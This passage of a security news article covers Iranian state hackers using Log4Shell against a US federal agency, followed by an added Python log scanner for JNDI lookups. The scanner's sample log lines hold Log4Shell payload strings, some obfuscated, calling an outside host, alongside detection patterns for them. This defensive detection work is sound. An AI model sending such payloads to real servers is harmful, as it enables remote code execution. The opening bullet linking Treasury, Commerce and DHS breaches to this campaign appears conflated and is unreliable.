Iranian APT Uses Log4j Vulnerability To Hack US Federal Network

Summary Of The Attack

  • In December of last year, US federal agencies were targeted in a wave of intrusions that also hit private companies.
  • The Department of the Treasury, the Department of Commerce, and the Department of Homeland Security were all affected.
  • This time, according to the FBI and CISA, Iranian government-sponsored hackers accessed an undisclosed US federal agency’s network early this year, using the Log4Shell vulnerability to deploy cryptocurrency miners and steal credentials.
  • “Cyber threat actors exploited the Log4Shell vulnerability in an unpatched VMware Horizon server, installed XMRig crypto mining software, advanced to the domain controller (DC), compromised credentials, and then implanted Ngrok reverse proxies on several hosts to maintain persistence,” according to the advisory.
  • The intrusion highlights the pervasiveness of the Log4j vulnerability, which made worldwide headlines a year ago and remains a live danger for many organizations.
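The chain quoted above starts with a Log4Shell request against the unpatched Horizon server, so the first thing a defender should check is the web and Horizon access logs for JNDI lookup strings. The Python below is an added example, not code from the advisory or from the original article: it undoes the nested-lookup tricks (`${lower:j}`, `${::-j}`, `${env:X:-j}`) and URL encoding that attackers use to evade a naive search for `${jndi:`, then flags the JNDI scheme used. The log lines are constructed for the example and the addresses are documentation-range IPs, not indicators from the advisory; a hit means an exploitation attempt was logged, and confirming compromise still requires the host-side checks the advisory describes (XMRig, credential use, Ngrok).

```python
import re
from urllib.parse import unquote

# Innermost Log4j lookup: ${...} with no nested braces inside.
_INNER = re.compile(r"\$\{([^${}]*)\}")
# JNDI reference with one of the schemes Log4j 2.x will actually resolve.
_JNDI = re.compile(r"jndi:(ldaps?|rmi|dns|iiop|corbanam|nds|http)\s*:", re.IGNORECASE)


def _resolve_lookup(body: str) -> str:
    """Evaluate one innermost lookup the way the vulnerable Log4j versions do."""
    prefix, sep, rest = body.partition(":")
    if sep and prefix.lower() == "lower":
        return rest.lower()
    if sep and prefix.lower() == "upper":
        return rest.upper()
    # "${::-j}" and "${env:UNSET:-j}": an unresolvable lookup collapses to its default.
    if ":-" in body:
        return body.split(":-", 1)[1]
    # Any other lookup is left as its body text so the scheme can still be matched.
    return body


def normalize(s: str, max_rounds: int = 20) -> str:
    """Repeatedly resolve innermost lookups until the string stops changing."""
    for _ in range(max_rounds):
        new = _INNER.sub(lambda m: _resolve_lookup(m.group(1)), s)
        if new == s:
            break
        s = new
    return s


def find_log4shell(lines):
    """Return (line number, scheme) for every line carrying a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        norm = normalize(unquote(line))   # decode %24%7B... before resolving lookups
        m = _JNDI.search(norm)
        if m:
            hits.append((n, m.group(1).lower()))
    return hits


# Constructed sample access-log lines (not from the advisory). Line 1 and 6 are benign;
# 2 is a plain payload, 3 and 5 use nested lookups, 4 is URL-encoded in the query string.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Feb/2022:10:00:01 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [01/Feb/2022:10:00:02 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.7:1389/a}"',
    '10.0.0.9 - - [01/Feb/2022:10:00:03 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:r}mi://203.0.113.7:1099/a}"',
    '10.0.0.9 - - [01/Feb/2022:10:00:04 +0000] "GET /portal/?x=%24%7Bjndi%3Adns%3A%2F%2F203.0.113.7%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    '10.0.0.9 - - [01/Feb/2022:10:00:05 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${${env:NOPE:-j}ndi:${::-l}dap://203.0.113.7/a}"',
    '10.0.0.12 - - [01/Feb/2022:10:00:06 +0000] "GET /docs/jndi-ldap-howto.html HTTP/1.1" 200 8192 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for n, scheme in find_log4shell(SAMPLE_LOG):
        print(f"line {n}: JNDI lookup via {scheme}")
```

Scanning only the User-Agent header is not enough: the advisory's attack path goes through Horizon, and Log4Shell payloads can arrive in any logged field (query strings, headers, form values), which is why the whole line is normalized and matched.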

What Happened?

According to the FBI and CISA, Iranian government-sponsored hackers accessed an undisclosed US federal agency’s network early this year, using the